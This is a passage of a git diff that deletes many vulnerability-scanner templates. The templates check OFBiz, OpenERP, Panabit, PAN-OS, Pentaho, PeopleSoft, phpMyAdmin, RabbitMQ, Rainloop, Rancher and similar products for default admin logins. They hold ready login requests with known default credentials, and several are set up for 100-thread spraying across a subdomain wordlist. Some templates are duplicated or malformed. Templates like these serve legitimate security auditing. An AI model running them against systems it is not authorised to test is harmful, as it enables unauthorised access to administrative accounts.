- author: pdteam
- severity: high
- verified: false
-
-rules:
- r0:
- request:
- method: POST
- path: /control/login
- body: USERNAME=admin&PASSWORD=ofbiz&FTOKEN=&JavaScriptEnabled=Y
- expression: |
- (response.status == 200 || response.status == 302) && && response.body.bcontains(b'ofbiz-pagination-template') && response.body.bcontains(b'Powered by OFBiz') && !response.body.bcontains(b'user login id "admin" has been disabled')
-expression: r0()
\ No newline at end of file
diff --git a/tmp/default/openerp-default-password.yaml b/tmp/default/openerp-default-password.yaml
deleted file mode 100644
index 247e82d52b..0000000000
--- a/tmp/default/openerp-default-password.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: openerp-default-password
-
-info:
- name: Openerp Default Password
- author: zan8in
- severity: high
- verified: true
- description: app="OpenERP"
-
-set:
- hosturl: request.url
- r1: md5(randomLowercase(6))
-rules:
- r0:
- request:
- method: POST
- path: /web/session/authenticate
- headers:
- Accept: application/json, text/javascript, */*; q=0.01
- Content-Type: application/json
- X-Requested-With: XMLHttpRequest
- Accept-Encoding: gzip, deflate
- Referer: "{{hosturl}}"
- Origin: "{{hosturl}}"
- body: |
- {"jsonrpc":"2.0","method":"call","params":{"db":"OPENERP7","login":"admin","password":"admin","base_location":"{{hosturl}}","session_id":"{{r1}}","context":{}},"id":"r7"}
- expression: |
- response.status == 200 && response.body.bcontains(b"\"username\": \"admin\",")
-expression: r0()
-
diff --git a/tmp/default/operations-automation-default-page-9336.yaml b/tmp/default/operations-automation-default-page-9336.yaml
deleted file mode 100644
index 219a59d534..0000000000
--- a/tmp/default/operations-automation-default-page-9336.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: operations-automation-default-page
-info:
- name: Operations Automation Default Page
- author: dhiyaneshDK
- severity: info
- reference: https://www.shodan.io/search?query=http.title%3A%22ClearPass+Policy+Manager+-+Aruba+Networks%22
- tags: tech,default
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET / HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'Operations Automation Default Page'
- - type: status
- status:
- - 200
diff --git a/tmp/default/panabit-default-login-9439.yaml b/tmp/default/panabit-default-login-9439.yaml
deleted file mode 100644
index 1260f0f2e9..0000000000
--- a/tmp/default/panabit-default-login-9439.yaml
+++ /dev/null
@@ -1,42 +0,0 @@
-id: panabit-default-login
-info:
- name: Panabit Gateway Default Login
- author: pikpikcu
- severity: high
- reference: https://max.book118.com/html/2017/0623/117514590.shtm
- tags: panabit,default-login
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /control/login HTTP/1.1
- Host: {{Subdomains}}
- Origin: {{Scheme}}://{{Subdomains}}
- Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAjZMsILtbrBp8VbC
- Referer: {{Scheme}}://{{Subdomains}}/login/login.htm
- Accept-Encoding: gzip, deflate
- Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
-
- ------WebKitFormBoundaryAjZMsILtbrBp8VbC
- Content-Disposition: form-data; name="username"
-
- admin
- ------WebKitFormBoundaryAjZMsILtbrBp8VbC
- Content-Disposition: form-data; name="password"
-
- panabit
- ------WebKitFormBoundaryAjZMsILtbrBp8VbC--
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ''
- - 'urn:schemas-microsoft-com:vml'
- part: body
- condition: and
- - type: status
- status:
- - 200
diff --git a/tmp/default/panabit-default-login.yaml b/tmp/default/panabit-default-login.yaml
deleted file mode 100644
index 0704aed04b..0000000000
--- a/tmp/default/panabit-default-login.yaml
+++ /dev/null
@@ -1,46 +0,0 @@
-id: panabit-default-login
-
-info:
- name: Panabit Gateway Default Login
- author: pikpikcu
- severity: high
- reference: https://max.book118.com/html/2017/0623/117514590.shtm
- tags: panabit,default-login
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /control/login HTTP/1.1
- Host: {{Subdomains}}
- Origin: {{Scheme}}://{{Subdomains}}
- Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAjZMsILtbrBp8VbC
- Referer: {{Scheme}}://{{Subdomains}}/login/login.htm
- Accept-Encoding: gzip, deflate
- Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
-
- ------WebKitFormBoundaryAjZMsILtbrBp8VbC
- Content-Disposition: form-data; name="username"
-
- admin
- ------WebKitFormBoundaryAjZMsILtbrBp8VbC
- Content-Disposition: form-data; name="password"
-
- panabit
- ------WebKitFormBoundaryAjZMsILtbrBp8VbC--
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ''
- - 'urn:schemas-microsoft-com:vml'
- part: body
- condition: and
-
- - type: status
- status:
- - 200
diff --git a/tmp/default/panabit-default-password-9442.yaml b/tmp/default/panabit-default-password-9442.yaml
deleted file mode 100644
index 1f98f7f508..0000000000
--- a/tmp/default/panabit-default-password-9442.yaml
+++ /dev/null
@@ -1,45 +0,0 @@
-id: panabit-gateway-defalut-password
-info:
- name: Panabit Default Password
- author: pikpikcu
- severity: high
- reference: https://max.book118.com/html/2017/0623/117514590.shtm
- tags: panabit,default-login
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /login/userverify.cgi HTTP/1.1
- Host: {{Subdomains}}
- Content-Length: 246
- Origin: https://{{Subdomains}}
- Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAjZMsILtbrBp8VbC
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
- Referer: https://{{Subdomains}}/login/login.htm
- Accept-Encoding: gzip, deflate
- Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
- Connection: close
-
- ------WebKitFormBoundaryAjZMsILtbrBp8VbC
- Content-Disposition: form-data; name="username"
-
- admin
- ------WebKitFormBoundaryAjZMsILtbrBp8VbC
- Content-Disposition: form-data; name="password"
-
- panabit
- ------WebKitFormBoundaryAjZMsILtbrBp8VbC--
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ''
- - 'urn:schemas-microsoft-com:vml'
- part: body
- condition: and
- - type: status
- status:
- - 200
diff --git a/tmp/default/panabit-default-password.yaml b/tmp/default/panabit-default-password.yaml
deleted file mode 100644
index 72094cfe85..0000000000
--- a/tmp/default/panabit-default-password.yaml
+++ /dev/null
@@ -1,49 +0,0 @@
-id: panabit-gateway-defalut-password
-
-info:
- name: Panabit Default Password
- author: pikpikcu
- severity: high
- reference: https://max.book118.com/html/2017/0623/117514590.shtm
- tags: panabit,default-login
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /login/userverify.cgi HTTP/1.1
- Host: {{Subdomains}}
- Content-Length: 246
- Origin: https://{{Subdomains}}
- Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAjZMsILtbrBp8VbC
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
- Referer: https://{{Subdomains}}/login/login.htm
- Accept-Encoding: gzip, deflate
- Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
- Connection: close
-
- ------WebKitFormBoundaryAjZMsILtbrBp8VbC
- Content-Disposition: form-data; name="username"
-
- admin
- ------WebKitFormBoundaryAjZMsILtbrBp8VbC
- Content-Disposition: form-data; name="password"
-
- panabit
- ------WebKitFormBoundaryAjZMsILtbrBp8VbC--
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ''
- - 'urn:schemas-microsoft-com:vml'
- part: body
- condition: and
-
- - type: status
- status:
- - 200
diff --git a/tmp/default/panabit-gateway-default-password.yaml b/tmp/default/panabit-gateway-default-password.yaml
deleted file mode 100644
index e615158667..0000000000
--- a/tmp/default/panabit-gateway-default-password.yaml
+++ /dev/null
@@ -1,18 +0,0 @@
-id: panabit-gateway-default-password
-
-info:
- name: Panabit Gateway Default Password
- author: Print1n(https://github.com/Print1n)
- severity: high
- verified: true
- description: app="Panabit-智能网关"
-
-rules:
- r0:
- request:
- method: POST
- path: /login/userverify.cgi
- body: username=admin&password=panabit
- expression: response.status == 200 && response.headers["set-cookie"].contains("paonline_admin") && response.body.bcontains(b"URL=/index.htm")
-expression: r0()
-
diff --git a/tmp/default/panabit-gateway-default-password.yml b/tmp/default/panabit-gateway-default-password.yml
deleted file mode 100644
index 9ed9d6a4ce..0000000000
--- a/tmp/default/panabit-gateway-default-password.yml
+++ /dev/null
@@ -1,16 +0,0 @@
-name: poc-yaml-panabit-gateway-default-password
-manual: true
-transport: http
-rules:
- r0:
- request:
- cache: true
- method: POST
- path: /login/userverify.cgi
- body: username=admin&password=panabit
- expression: response.status == 200 && response.headers["Set-Cookie"].contains("paonline_admin") && response.body.bcontains(b"URL=/index.htm")
-expression: r0()
-detail:
- author: Print1n(https://github.com/Print1n)
- links:
- - https://max.book118.com/html/2017/0623/117514590.shtm
diff --git a/tmp/default/panabit-ixcache-default-password.yaml b/tmp/default/panabit-ixcache-default-password.yaml
deleted file mode 100644
index 6eaeb737dc..0000000000
--- a/tmp/default/panabit-ixcache-default-password.yaml
+++ /dev/null
@@ -1,18 +0,0 @@
-id: panabit-ixcache-default-password
-
-info:
- name: Panabit Ixcache Default Password
- author: B1anda0(https://github.com/B1anda0)
- severity: high
- verified: true
- description: body="iXCache"
-
-rules:
- r0:
- request:
- method: POST
- path: /login/userverify.cgi
- body: username=admin&password=ixcache
- expression: response.status == 200 && response.body.bcontains(b"URL=/cgi-bin/monitor.cgi")
-expression: r0()
-
diff --git a/tmp/default/panabit-ixcache-default-password.yml b/tmp/default/panabit-ixcache-default-password.yml
deleted file mode 100644
index a7bd83b5a4..0000000000
--- a/tmp/default/panabit-ixcache-default-password.yml
+++ /dev/null
@@ -1,16 +0,0 @@
-name: poc-yaml-panabit-ixcache-default-password
-manual: true
-transport: http
-rules:
- r0:
- request:
- cache: true
- method: POST
- path: /login/userverify.cgi
- body: username=admin&password=ixcache
- expression: response.status == 200 && response.body.bcontains(b"URL=/cgi-bin/monitor.cgi")
-expression: r0()
-detail:
- author: B1anda0(https://github.com/B1anda0)
- links:
- - http://forum.panabit.com/thread-10830-1-1.html
diff --git a/tmp/default/panos-default-login-9456.yaml b/tmp/default/panos-default-login-9456.yaml
deleted file mode 100644
index 8d29c2b3db..0000000000
--- a/tmp/default/panos-default-login-9456.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: panos-default-login
-info:
- name: Palo Alto Networks PAN-OS Default Login
- author: Techryptic (@Tech)
- severity: high
- description: Default Login of admin:admin on Palo Alto Networks PAN-OS application.
- reference: https://docs.paloaltonetworks.com/pan-os/8-1/pan-os-admin/getting-started/integrate-the-firewall-into-your-management-network/perform-initial-configuration.html#:~:text=By%20default%2C%20the%20firewall%20has,with%20other%20firewall%20configuration%20tasks.
- tags: paloalto,panos,default-login
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /php/login.php HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: application/x-www-form-urlencoded
-
- user=admin&passwd=admin&challengePwd=&ok=Login
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Set-Cookie: PHPSESSID"
- part: header
- - type: word
- words:
- - "Warning: Your device is still configured with the default admin"
- - type: status
- status:
- - 200
diff --git a/tmp/default/panos-default-login.yaml b/tmp/default/panos-default-login.yaml
deleted file mode 100644
index cb81200015..0000000000
--- a/tmp/default/panos-default-login.yaml
+++ /dev/null
@@ -1,37 +0,0 @@
-id: panos-default-login
-
-info:
- name: Palo Alto Networks PAN-OS Default Login
- author: Techryptic (@Tech)
- severity: high
- description: Default Login of admin:admin on Palo Alto Networks PAN-OS application.
- reference: https://docs.paloaltonetworks.com/pan-os/8-1/pan-os-admin/getting-started/integrate-the-firewall-into-your-management-network/perform-initial-configuration.html#:~:text=By%20default%2C%20the%20firewall%20has,with%20other%20firewall%20configuration%20tasks.
- tags: paloalto,panos,default-login
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /php/login.php HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: application/x-www-form-urlencoded
-
- user=admin&passwd=admin&challengePwd=&ok=Login
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Set-Cookie: PHPSESSID"
- part: header
-
- - type: word
- words:
- - "Warning: Your device is still configured with the default admin"
-
- - type: status
- status:
- - 200
\ No newline at end of file
diff --git a/tmp/default/pentaho-default-login-9479.yaml b/tmp/default/pentaho-default-login-9479.yaml
deleted file mode 100644
index 47bb663352..0000000000
--- a/tmp/default/pentaho-default-login-9479.yaml
+++ /dev/null
@@ -1,34 +0,0 @@
-id: pentaho-default-login
-info:
- name: Pentaho Default Login
- author: pussycat0x
- severity: high
- metadata:
- shodan-query: 'pentaho'
- tags: pentaho,default-login
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /pentaho/j_spring_security_check HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-
- j_username=admin&j_password=password
- matchers-condition: and
- matchers:
- - type: word
- part: header
- words:
- - 'pentaho/Home'
- - 'JSESSIONID='
- condition: and
- - type: status
- status:
- - 302
diff --git a/tmp/default/pentaho-default-login.yaml b/tmp/default/pentaho-default-login.yaml
deleted file mode 100644
index 01e248a3ac..0000000000
--- a/tmp/default/pentaho-default-login.yaml
+++ /dev/null
@@ -1,38 +0,0 @@
-id: pentaho-default-login
-
-info:
- name: Pentaho Default Login
- author: pussycat0x
- severity: high
- metadata:
- shodan-query: 'pentaho'
- tags: pentaho,default-login
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /pentaho/j_spring_security_check HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-
- j_username=admin&j_password=password
- matchers-condition: and
- matchers:
- - type: word
- part: header
- words:
- - 'pentaho/Home'
- - 'JSESSIONID='
- condition: and
-
- - type: status
- status:
- - 302
diff --git a/tmp/default/peoplesoft-default-login.yaml b/tmp/default/peoplesoft-default-login.yaml
deleted file mode 100644
index 32b4b97f35..0000000000
--- a/tmp/default/peoplesoft-default-login.yaml
+++ /dev/null
@@ -1,85 +0,0 @@
-id: peoplesoft-default-login
-
-info:
- name: Oracle PeopleSoft - Default Login
- author: LogicalHunter
- severity: high
- description: Oracle PeopleSoft contains a default admin login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
- reference:
- - https://www.oracle.com/applications/peoplesoft/
- - https://erpscan.io/press-center/blog/peoplesoft-default-accounts/
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
- cvss-score: 8.3
- cwe-id: CWE-522
- metadata:
- verified: true
- shodan-query: title:"Oracle PeopleSoft Sign-in"
- tags: default-login,peoplesoft,oracle,fuzz
-
-http:
- - method: POST
- path:
- - "{{BaseURL}}/psc/ps/?&cmd=login&languageCd=ENG"
- - "{{BaseURL}}/psp/csperf/?&cmd=login&languageCd=ENG"
- - "{{BaseURL}}/psp/FMPRD/?&cmd=login&languageCd=ENG"
- - "{{BaseURL}}/psp/csprd/?&cmd=login&languageCd=ENG"
- - "{{BaseURL}}/psp/hcmprdfp/?&cmd=login&languageCd=ENG"
- - "{{BaseURL}}/psp/HRPRODASP/?&cmd=login&languageCd=ENG"
- - "{{BaseURL}}/psp/guest/?&cmd=login&languageCd=ENG"
- - "{{BaseURL}}/psp/CSPRD_PUB/?&cmd=login&languageCd=ENG"
- - "{{BaseURL}}/psp/LHCGWPRD_1/?&cmd=login&languageCd=ENG"
- - "{{BaseURL}}/psp/CCHIPRD_2/?&cmd=login&languageCd=ENG"
- - "{{BaseURL}}/psp/applyuth/?&cmd=login&languageCd=ENG"
- - "{{BaseURL}}/psp/HRPRD/?&cmd=login&languageCd=ENG"
- - "{{BaseURL}}/psp/CAREERS/?&cmd=login&languageCd=ENG"
- - "{{BaseURL}}/psp/heprod_5/?&cmd=login&languageCd=ENG"
- - "{{BaseURL}}/psp/saprod/?&cmd=login&languageCd=ENG"
- - "{{BaseURL}}/psp/hr857prd_er/?&cmd=login&languageCd=ENG"
- - "{{BaseURL}}/psp/CHUMPRDM/?&cmd=login&languageCd=ENG"
- - "{{BaseURL}}/psp/HR92PRD/?&cmd=login&languageCd=ENG"
- - "{{BaseURL}}/psp/cangate_1/?&cmd=login&languageCd=ENG"
- - "{{BaseURL}}/psp/ihprd/?&cmd=login&languageCd=ENG"
-
- body: "timezoneOffset=360&ptmode=f&ptlangcd=ENG&ptinstalledlang=ENG&userid={{username}}&pwd={{password}}&ptlangsel=ENG"
- headers:
- Content-Type: application/x-www-form-urlencoded
-
- attack: pitchfork
- payloads:
- username:
- - PS
- - VP1
- - PSADMIN
- - PSEM
- - PSHC
- - PSCR
- - HFG
- - PSPY
- - HHR_JPM
- - HHR_CMP
- password:
- - PS
- - VP1
- - PSADMIN
- - PSEM
- - PSHC
- - PSCR
- - HFG
- - PSPY
- - HHR_JPM
- - HHR_CMP
-
- stop-at-first-match: true
- matchers-condition: and
- matchers:
- - type: word
- part: header
- words:
- - 'Set-Cookie: PS_TOKEN='
-
- - type: status
- status:
- - 302
-
-# Enhanced by md on 2023/01/09
diff --git a/tmp/default/phpmyadmin-default-login.yaml b/tmp/default/phpmyadmin-default-login.yaml
deleted file mode 100644
index 2cfb0ca52b..0000000000
--- a/tmp/default/phpmyadmin-default-login.yaml
+++ /dev/null
@@ -1,78 +0,0 @@
-id: phpmyadmin-default-login
-
-info:
- name: phpMyAdmin - Default Login
- author: Natto97,notwhy
- severity: high
- description: phpMyAdmin contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
- reference:
- - https://www.phpmyadmin.net
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
- cvss-score: 8.3
- cwe-id: CWE-522
- metadata:
- verified: true
- max-request: 16
- shodan-query: http.title:phpMyAdmin
- tags: default-login,phpmyadmin
-
-http:
- - raw:
- - |
- GET /index.php HTTP/1.1
- Host: {{Hostname}}
- - |
- POST /index.php HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
- Cookie: phpMyAdmin={{token2}}; pma_lang=en
-
- set_session={{session}}&pma_username={{user}}&pma_password={{password}}&server=1&route=%2F&token={{token}}
-
- attack: clusterbomb
- payloads:
- user:
- - root
- - mysql
- password:
- - 123456
- - root
- - mysql
- - toor
-
- extractors:
- - type: regex
- name: token
- internal: true
- group: 1
- regex:
- - 'name="token" value="([0-9a-z]+)"'
-
- - type: regex
- name: token2
- internal: true
- group: 1
- regex:
- - 'name="set_session" value="([0-9a-z]+)"'
-
- - type: regex
- name: session
- part: header
- internal: true
- group: 2
- regex:
- - "phpMyAdmin(_https)?=([0-9a-z]+)" # for HTTPS
- req-condition: true
- stop-at-first-match: true
-
- matchers-condition: and
- matchers:
- - type: dsl
- dsl:
- - contains(header_2, "phpMyAdmin=") && contains(header_2, "pmaUser-1=")
- - status_code_2 == 302
- - contains(header_2, 'index.php?collation_connection=utf8mb4_unicode_ci') || contains(header_2, '/index.php?route=/&route=%2F')
- condition: and
-
-# digest: 4b0a00483046022100dcf242cbc47e360a14176d32e00bc8b9441c81e64ae9cdb4a281cbbf198bb5bf022100ce68fc3e5428d1bec4d4048d60eb62920b94e64edd5bdce714d1e751667cd3a6:922c64590222798bb761d5b6d8e72950
diff --git a/tmp/default/phpmyadmin-default-page.yaml b/tmp/default/phpmyadmin-default-page.yaml
deleted file mode 100644
index 52538a4147..0000000000
--- a/tmp/default/phpmyadmin-default-page.yaml
+++ /dev/null
@@ -1,36 +0,0 @@
-info:
- id: phpmyadmin-default-page
- name: phpMyAdmin Default Page
- author: OpenAI
- description: Template to detect the default page of phpMyAdmin.
- severity: Low
- classification:
- country: any
- tags:
- - phpmyadmin
- - default-page
- - database
-
- matcher-condition: or
-
- requests:
- method: GET
- path:
- - "/"
- - "/index.php"
- - "/phpmyadmin/"
- - "/phpmyadmin/index.php"
- description: Attempt to access the default page of phpMyAdmin
- condition: and
-
- matchers:
- - pattern: "phpMyAdmin"
- type: body
- description: phpMyAdmin default page found in the response body
- - pattern: "phpMyAdmin - Error"
- type: body
- description: phpMyAdmin error page found in the response body
-
- response:
- - status:
- - 200
\ No newline at end of file
diff --git a/tmp/default/rabbitmq-default-admin-9781.yaml b/tmp/default/rabbitmq-default-admin-9781.yaml
deleted file mode 100644
index b0d87b7e02..0000000000
--- a/tmp/default/rabbitmq-default-admin-9781.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: rabbitmq-default-admin
-info:
- name: RabbitMQ Default Credentials
- author: fyoorer,dwisiswant0
- severity: high
- tags: rabbitmq,default-login
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /api/whoami HTTP/1.1
- Host: {{Subdomains}}
- Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "application/json"
- part: header
- - type: word
- words:
- - "{\"name\":\"guest\""
- part: body
- - type: status
- status:
- - 200
diff --git a/tmp/default/rabbitmq-default-admin.yaml b/tmp/default/rabbitmq-default-admin.yaml
deleted file mode 100644
index a76bc85783..0000000000
--- a/tmp/default/rabbitmq-default-admin.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: rabbitmq-default-admin
-
-info:
- name: RabbitMQ Default Credentials
- author: fyoorer,dwisiswant0
- severity: high
- tags: rabbitmq,default-login
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- GET /api/whoami HTTP/1.1
- Host: {{Subdomains}}
- Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "application/json"
- part: header
- - type: word
- words:
- - "{\"name\":\"guest\""
- part: body
- - type: status
- status:
- - 200
diff --git a/tmp/default/rabbitmq-default-login-9784.yaml b/tmp/default/rabbitmq-default-login-9784.yaml
deleted file mode 100644
index b1e4a8692b..0000000000
--- a/tmp/default/rabbitmq-default-login-9784.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: rabbitmq-default-login
-info:
- name: RabbitMQ admin Default Login
- author: fyoorer,dwisiswant0
- severity: high
- tags: rabbitmq,default-login
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /api/whoami HTTP/1.1
- Host: {{Subdomains}}
- Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "application/json"
- part: header
- - type: word
- words:
- - "{\"name\":\"guest\""
- part: body
- - type: status
- status:
- - 200
diff --git a/tmp/default/rabbitmq-default-login.yaml b/tmp/default/rabbitmq-default-login.yaml
deleted file mode 100644
index 6d95a807a9..0000000000
--- a/tmp/default/rabbitmq-default-login.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: rabbitmq-default-login
-
-info:
- name: RabbitMQ admin Default Login
- author: fyoorer,dwisiswant0
- severity: high
- tags: rabbitmq,default-login
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- GET /api/whoami HTTP/1.1
- Host: {{Subdomains}}
- Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "application/json"
- part: header
- - type: word
- words:
- - "{\"name\":\"guest\""
- part: body
- - type: status
- status:
- - 200
diff --git a/tmp/default/rabbitmq-default-password.yaml b/tmp/default/rabbitmq-default-password.yaml
deleted file mode 100644
index 0c314d6160..0000000000
--- a/tmp/default/rabbitmq-default-password.yaml
+++ /dev/null
@@ -1,24 +0,0 @@
-id: rabbitmq-default-password
-
-info:
- name: RabbitMQ Default Password
- author: mumu0215(https://github.com/mumu0215)
- severity: high
- verified: true
- description: app="RabbitMQ-Management"
-
-rules:
- r0:
- request:
- method: GET
- path: /api/whoami
- expression: response.status == 401
- r1:
- request:
- method: GET
- path: /api/whoami
- headers:
- Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
- expression: response.status == 200 && response.body.bcontains(b"\"name\":\"guest\"")
-expression: r0() && r1()
-
diff --git a/tmp/default/rabbitmq-default-password.yml b/tmp/default/rabbitmq-default-password.yml
deleted file mode 100644
index 4b5d389aa9..0000000000
--- a/tmp/default/rabbitmq-default-password.yml
+++ /dev/null
@@ -1,23 +0,0 @@
-name: poc-yaml-rabbitmq-default-password
-manual: true
-transport: http
-rules:
- r0:
- request:
- cache: true
- method: GET
- path: /api/whoami
- expression: response.status == 401
- r1:
- request:
- cache: true
- method: GET
- path: /api/whoami
- headers:
- Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
- expression: response.status == 200 && response.body.bcontains(b"\"name\":\"guest\"")
-expression: r0() && r1()
-detail:
- author: mumu0215(https://github.com/mumu0215)
- links:
- - http://luckyzmj.cn/posts/15dff4d3.html
diff --git a/tmp/default/rainloop-default-login.yaml b/tmp/default/rainloop-default-login.yaml
deleted file mode 100644
index 48b5f927a4..0000000000
--- a/tmp/default/rainloop-default-login.yaml
+++ /dev/null
@@ -1,55 +0,0 @@
-id: rainloop-default-login
-
-info:
- name: Rainloop WebMail - Default Admin Login
- author: For3stCo1d
- severity: high
- description: Rainloop WebMail default admin login credentials were successful.
- reference:
- - https://github.com/RainLoop/rainloop-webmail/issues/28
- metadata:
- verified: true
- max-request: 2
- fofa-query: app="RAINLOOP-WebMail"
- tags: default-login,rainloop,webmail,foss
-
-http:
- - raw:
- - | # Login Portal: /?admin
- GET /?/AdminAppData@no-mobile-0/0/15503332983847185/ HTTP/1.1
- Host: {{Hostname}}
- - |
- POST /?/Ajax/&q[]=/0/ HTTP/2
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-
- Login={{user}}&Password={{pass}}&Action=AdminLogin&XToken={{token}}
-
- attack: pitchfork
- payloads:
- user:
- - admin
- pass:
- - 12345
-
- extractors:
- - type: regex
- name: token
- internal: true
- group: 1
- regex:
- - 'token":"(.+?)"'
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - '"Action":"AdminLogin"'
- - '"Result":true'
- condition: and
-
- - type: status
- status:
- - 200
-
-# digest: 490a00463044022011d2ae91eff5020e269da659009bc07fbb88ab0ed413d851cef53af4fcbeb62902201e8b6d2a4e63b738161bf55d2099768df041004f0d36635923d28f1b70752a8b:922c64590222798bb761d5b6d8e72950
diff --git a/tmp/default/rancher-default-password.yaml b/tmp/default/rancher-default-password.yaml
deleted file mode 100644
index c015a39e81..0000000000
--- a/tmp/default/rancher-default-password.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: rancher-default-password
-
-info:
- name: Rancher Default Login
- author: princechaddha
- severity: high
- verified: false
- description: |
- Rancher is a open-source multi-cluster orchestration platform, lets operations teams deploy, manage and secure enterprise Kubernetes.
- app="RANCHER-容器管理"
- reference:
- - https://github.com/rancher/rancher
-
-rules:
- r0:
- request:
- method: GET
- path: /v3/settings/first-login
- expression: response.status == 200 && response.headers["set-cookie"].contains('CSRF=')
- output:
- search: '"Set-Cookie: CSRF=(?P.*?)([\s|;])".bsubmatch(response.raw_header)'
- csrf: search["csrf"]
- r1:
- request:
- method: POST
- path: /v3-public/localProviders/local?action=login
- headers:
- Cookie: CSRF={{csrf}}
- X-Api-Csrf: "{{csrf}}"
- body: |
- {"username":"admin","password":"admin","description":"UI Session","responseType":"cookie","labels":{"ui-session":"true"}}
- expression: response.status == 200 && response.raw_header.bcontains(b'R_SESS=token')
-expression: r0() && r1()
diff --git a/tmp/default/rockmongo-default-credentials-9896.yaml b/tmp/default/rockmongo-default-credentials-9896.yaml
deleted file mode 100644
index 0db583fdb5..0000000000
--- a/tmp/default/rockmongo-default-credentials-9896.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: rockmongo-default-credentials
-info:
- name: Rockmongo Default Credentials
- author: pikpikcu
- severity: high
- tags: rockmongo,default-login
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /index.php?action=login.index HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
